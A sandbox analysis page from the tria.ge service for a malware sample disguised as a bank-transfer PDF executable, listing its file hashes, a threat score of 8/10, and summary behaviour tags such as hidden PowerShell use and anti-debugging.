Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    detalle_transferencia_2024-06-17T205732.008 0200_1765330002017577_PDF.exe

  • Size

    583KB

  • Sample

    240620-anbp9sydjf

  • MD5

    b8a89704d7c7ca02539576bdfc10ca7a

  • SHA1

    f23f9988f2db7cbab1401d5d90a00a9101c6c188

  • SHA256

    f3a22e965f778a9b4072a659166407e283688a20492feff37818f61b969efa96

  • SHA512

    b1d1f2df73472daba9097801501ac5bd2add87f3598235965c662eaa04ecb7730bbdf454a18ccd8c87e2be7c848195de8a383feac900b252b7819f337f4a1ed4

  • SSDEEP

    12288:1oGrk4f6kRkGDzfQ/kBvjzowwc/Lds0lE5SaR9K/vxtUf7:1oGI4ykRkGDOSrzowje0lE9cvxu

Score
8/10

Malware Config

Targets

    • Target

      detalle_transferencia_2024-06-17T205732.008 0200_1765330002017577_PDF.exe

    • Size

      583KB

    • MD5

      b8a89704d7c7ca02539576bdfc10ca7a

    • SHA1

      f23f9988f2db7cbab1401d5d90a00a9101c6c188

    • SHA256

      f3a22e965f778a9b4072a659166407e283688a20492feff37818f61b969efa96

    • SHA512

      b1d1f2df73472daba9097801501ac5bd2add87f3598235965c662eaa04ecb7730bbdf454a18ccd8c87e2be7c848195de8a383feac900b252b7819f337f4a1ed4

    • SSDEEP

      12288:1oGrk4f6kRkGDzfQ/kBvjzowwc/Lds0lE5SaR9K/vxtUf7:1oGI4ykRkGDOSrzowje0lE9cvxu

    Score
    8/10
    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks